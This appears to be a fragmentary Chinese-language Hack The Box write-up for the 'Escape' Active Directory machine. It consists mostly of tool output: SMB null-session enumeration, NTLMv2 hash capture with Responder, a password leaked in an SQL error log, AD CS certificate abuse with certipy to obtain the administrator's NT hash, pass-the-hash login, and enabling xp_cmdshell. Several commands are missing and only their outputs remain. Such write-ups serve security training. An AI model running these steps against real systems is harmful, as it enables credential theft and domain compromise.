nmap -p- --min-rate 10000 10.10.11.202 PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1433/tcp open ms-sql-s 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49668/tcp open unknown 49691/tcp open unknown 49692/tcp open unknown 49708/tcp open unknown 49712/tcp open unknown 63474/tcp open unknown
┌──(root💀kali)-[~/hackthebox/machine/escape] └─# openssl s_client -showcerts -connect 10.10.11.202:3269 | openssl x509 -noout -text Can't use SSL_get_servername depth=0 CN = dc.sequel.htb verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 CN = dc.sequel.htb verify error:num=21:unable to verify the first certificate verify return:1 depth=0 CN = dc.sequel.htb verify return:1 Certificate: Data: Version: 3 (0x2) Serial Number: 1e:00:00:00:04:90:52:7b:fc:91:38:74:2f:00:00:00:00:00:04 Signature Algorithm: sha256WithRSAEncryption Issuer: DC = htb, DC = sequel, CN = sequel-DC-CA Validity Not Before: Nov 18 21:20:35 2022 GMT Not After : Nov 18 21:20:35 2023 GMT Subject: CN = dc.sequel.htb Subject Public Key Info: Public Key Algorithm: rsaEncryption Public-Key: (2048 bit) Modulus: 00:a6:92:78:aa:2e:fe:07:2f:e4:d9:88:f2:d4:9f: 37:64:9d:73:fe:ca:4e:ef:85:bd:b5:46:70:3d:f8: 2f:98:38:f4:28:17:f8:15:1d:c8:37:d1:ad:2e:08: d5:5f:a0:87:c1:3b:5e:cf:c9:1d:97:6b:5c:e7:c1: c1:f2:8f:41:e2:6c:9a:2a:3c:e1:2a:64:57:d7:47: 98:69:27:b4:89:c4:f9:7d:95:28:2c:3c:42:53:3e: 28:bb:f7:db:b4:cd:c0:52:d3:c4:5c:a0:68:92:e0: 67:8b:ec:7c:c0:cd:97:a5:45:d1:ce:75:d6:3c:bd: f0:a9:01:6c:07:dd:69:32:e6:f5:67:3f:ca:99:ec: b7:11:98:31:4f:8d:cf:74:f6:38:09:92:70:0e:fa: 48:51:e5:e0:db:dd:c7:1b:5a:ff:c8:ca:97:df:50: 19:e1:e3:cb:78:d6:03:a5:8c:e8:7c:a8:38:0b:92: bf:da:66:8d:fb:04:d3:67:5b:7a:01:18:aa:01:60: 50:af:11:51:4c:7e:af:4c:ea:13:e8:d1:7e:e8:7c: 40:2d:71:71:c5:6c:3f:ec:ea:df:27:85:a5:e5:8e: 6e:8b:51:f9:bd:64:b5:7a:b9:d5:3c:4f:7c:6a:22: 63:7b:70:79:99:3b:0f:73:3c:3b:a0:a0:45:11:db: 33:45 Exponent: 65537 (0x10001) X509v3 extensions: 1.3.6.1.4.1.311.20.2: . .D.o.m.a.i.n.C.o.n.t.r.o.l.l.e.r X509v3 Extended Key Usage: TLS Web Client Authentication, TLS Web Server Authentication X509v3 Key Usage: critical Digital Signature, Key Encipherment S/MIME Capabilities: ......0...`.H.e...*0...`.H.e...-0...`.H.e....0...`.H.e....0...+....0 ..*.H.. X509v3 Subject Key Identifier: 22:E2:60:5F:A1:1E:F7:90:9E:56:2A:7B:95:BB:4C:0E:DE:6C:58:87 X509v3 Authority Key Identifier: 62:9F:32:A3:A0:F0:38:20:D4:60:C0:CD:6D:C5:FA:51:30:5E:C3:15 X509v3 CRL Distribution Points: Full Name: URI:ldap:///CN=sequel-DC-CA,CN=dc,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint Authority Information Access: CA Issuers - URI:ldap:///CN=sequel-DC-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=sequel,DC=htb?cACertificate?base?objectClass=certificationAuthority X509v3 Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb Signature Algorithm: sha256WithRSAEncryption Signature Value: 92:e4:4b:28:07:bc:2f:a3:51:de:8c:0f:4e:e7:ea:f3:7e:fd: 56:c4:6e:88:fe:fb:6a:9a:51:98:eb:5d:c6:49:7f:6e:2d:f3: 91:13:8b:11:26:c0:ff:b1:8e:cb:ee:c3:c8:af:c5:5f:8e:ac: f1:19:b2:2a:49:ed:cc:0f:8f:17:9d:45:cc:23:a5:e5:f2:ab: bf:85:b3:36:51:f5:0f:d0:c2:03:06:87:0a:56:08:b5:60:fd: ee:c8:f4:78:84:39:1b:bf:69:c1:f9:00:83:ac:5e:9d:28:4c: 1e:cd:f6:b3:02:7e:b0:88:b3:72:80:53:df:74:a7:25:7e:26: 1c:df:b1:e5:63:26:28:97:98:a7:a2:be:fb:cb:26:e9:27:c1: 89:ae:95:a9:e5:78:e6:52:5a:59:63:72:45:d6:cf:6f:6b:9c: a4:1f:38:33:35:08:93:7b:b1:6a:0d:18:df:87:de:15:65:43: 32:62:84:cf:2a:9b:d3:4e:d4:f2:e2:9e:95:24:3c:0a:b9:26: 8b:ec:3a:fa:fb:e5:93:af:22:04:9b:11:ad:21:63:bb:48:a1: 07:68:13:06:d9:31:23:02:40:37:4e:4a:5a:48:e9:f8:c9:81: ed:74:bc:26:69:fd:85:20:48:bf:1b:82:dc:ed:b4:21:98:37: dd:8b:2a:b4 read:errno=104
注意颁发证书的证书颁发机构sequel-DC-CA。
SMB - TCP 445
List
使用crackmapexec访问SMB
1 2 3 4
┌──(root💀kali)-[~/hackthebox/machine/escape] └─# crackmapexec smb 10.10.11.202 --shares SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.202 445 DC [-] Error enumerating shares: STATUS_USER_SESSION_DELETED
使用任何用户名和空密码:
1 2 3 4 5 6 7 8 9 10 11 12 13
┌──(root💀kali)-[~/hackthebox/machine/escape] └─# crackmapexec smb 10.10.11.202 -u fdnotreallyausername -p '' --shares SMB 10.10.11.202 445 DC [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False) SMB 10.10.11.202 445 DC [+] sequel.htb\fdnotreallyausername: SMB 10.10.11.202 445 DC [+] Enumerated shares SMB 10.10.11.202 445 DC Share Permissions Remark SMB 10.10.11.202 445 DC ----- ----------- ------ SMB 10.10.11.202 445 DC ADMIN$ Remote Admin SMB 10.10.11.202 445 DC C$ Default share SMB 10.10.11.202 445 DC IPC$ READ Remote IPC SMB 10.10.11.202 445 DC NETLOGON Logon server share SMB 10.10.11.202 445 DC Public READ SMB 10.10.11.202 445 DC SYSVOL Logon server share
Public
能访问的唯一共享是Public。使用-N为空密码,将pdf文件下载下来:
1 2 3 4 5 6 7 8 9 10 11
┌──(root💀kali)-[~/hackthebox/machine/escape] └─# smbclient //10.10.11.202/Public -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Sat Nov 19 06:51:25 2022 .. D 0 Sat Nov 19 06:51:25 2022 SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1470835 blocks available smb: \> get "SQL Server Procedures.pdf" getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (8.3 KiloBytes/sec) (average 8.3 KiloBytes/sec)
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'. [*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press helpfor extra shell commands SQL> select name from master..sysdatabases; name
SQL> xp_cmdshell whoami [-] ERROR(DC\SQLMOCK): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [OFF] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON]
[+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF]
[+] Generic Options: Responder NIC [tun0] Responder IP [10.10.16.2] Responder IPv6 [dead:beef:4::1000] Challenge set [random] Don't Respond To Names ['ISATAP'] [+] Current Session Variables: Responder Machine Name [WIN-H6VOL0QMDH2] Responder Domain Name [ZXWC.LOCAL] Responder DCE-RPC Port [49831] [+] Listening for events... [!] Error starting TCP server on port 53, check permissions or other servers running. [SMB] NTLMv2-SSP Client : 10.10.11.202 [SMB] NTLMv2-SSP Username : sequel\sql_svc [SMB] NTLMv2-SSP Hash : sql_svc::sequel:a052ed0636102870:E34517E6D5F61D5423F401D9A35B8AE0:010100000000000000FA92A342A2D901C3A576838D8EBA6E00000000020008005A0058005700430001001E00570049004E002D004800360056004F004C00300051004D0044004800320004003400570049004E002D004800360056004F004C00300051004D004400480032002E005A005800570043002E004C004F00430041004C00030014005A005800570043002E004C004F00430041004C00050014005A005800570043002E004C004F00430041004C000700080000FA92A342A2D9010600040002000000080030003000000000000000000000000030000012E38F1D56C0404175A7C4C531D6164BC569F5ABDD833B040000C1B5F25101B90A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0032000000000000000000
Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAK
ERRORLOG.BAK
该文件包含来自SQL服务器的日志:
1 2 3 4 5 6 7 8 9 10 11 12 13
*Evil-WinRM* PS C:\SQLServer\Logs> type ERRORLOG.BAK 2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) Sep 24 2019 13:48:23 Copyright (C) 2019 Microsoft Corporation Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
2022-11-18 13:43:05.97 Server UTC adjustment: -8:00 2022-11-18 13:43:05.97 Server (c) Microsoft Corporation. 2022-11-18 13:43:05.97 Server All rights reserved. 2022-11-18 13:43:05.97 Server Server process ID is 3788. 2022-11-18 13:43:05.97 Server System Manufacturer: 'VMware, Inc.', System Model: 'VMware7,1'. 2022-11-18 13:43:05.97 Server Authentication mode is MIXED. ...[snip]...
在日志的最后,有这些信息:
1 2 3 4 5
...[snip]... 2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] 2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8. 2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1] ...[snip]...
[*] Requesting certificate via RPC [*] Successfully requested certificate [*] Request ID is 13 [*] Got certificate with UPN 'administrator@sequel.htb' [*] Certificate has no object SID [*] Saved certificate and private key to 'administrator.pfx'
注意: 如果出现”The NETBIOS connection with the remote host timed out.”错误。请重新执行命令
┌──(root💀kali)-[~/hackthebox/machine/escape] └─# certipy auth -pfx administrator.pfx Certipy v4.4.0 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sequel.htb [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'administrator.ccache' [*] Trying to retrieve NT hashfor'administrator' [*] Got hashfor'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee
最后,可以通过WinRM PTH并作为管理员用户进行身份验证。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
┌──(root💀kali)-[~/hackthebox/machine/escape] └─# ls administrator.ccache administrator.pfx Certify.exe 'SQL Server Procedures.pdf'
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'. [*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press helpfor extra shell commands SQL>
[*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'. [*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (150 7208) [!] Press helpfor extra shell commands SQL> SELECT * FROM OPENROWSET(BULK N'C:\users\ryan.cooper\desktop\user.txt', SINGLE_CLOB) AS Contents BulkColumn
SQL> xp_cmdshell whoami [-] ERROR(DC\SQLMOCK): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for'xp_cmdshell'in SQL Server Books Online. SQL> EXECUTE sp_configure 'show advanced options', 1 [*] INFO(DC\SQLMOCK): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install. SQL> RECONFIGURE SQL> EXECUTE sp_configure 'xp_cmdshell', 1 [*] INFO(DC\SQLMOCK): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install. SQL> RECONFIGURE SQL> xp_cmdshell whoami output